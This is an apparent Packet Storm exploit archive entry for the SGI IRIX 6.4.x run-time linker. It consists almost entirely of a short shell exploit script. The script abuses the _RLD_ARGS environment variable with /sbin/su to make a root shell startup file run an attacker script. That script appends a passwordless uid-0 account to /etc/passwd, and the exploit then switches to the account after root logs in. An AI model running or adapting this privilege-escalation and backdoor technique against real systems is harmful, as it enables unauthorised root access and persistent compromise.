SGI IRIX 6.4.x Run-Time Linker Arbitrary File Creation

2019-04-28T00:00:00
ID PACKETSTORM:152657
Type packetstorm
Reporter Hacker Fantastic
Modified 2019-04-28T00:00:00

Description

                                        
                                            `#!/bin/sh   
# SGI IRIX <= 6.4.x run-time linker (rld) arbitrary file creation exploit  
# =======================================================================  
# The IRIX run-time linker on all versions prior to 6.5 does not properly  
# scrub environment variables when executing binaries with privilege or  
# capabilities. A malicious user can leverage this to create files as the  
# "root" user and partially control the contents.   
#  
# -- HackerFantastic (https://hacker.house)  
#  
echo "echo w00t::0:0:greetz:/:/bin/csh >> /etc/passwd" > /tmp/.x.sh  
chmod 755 /tmp/.x.sh  
_RLD_ARGS="-log /.cshrc |/tmp/.x.sh" /sbin/su  
last -3 root  
echo "[ waiting 5mins for root to login..."  
sleep 300  
su - w00t  
  
`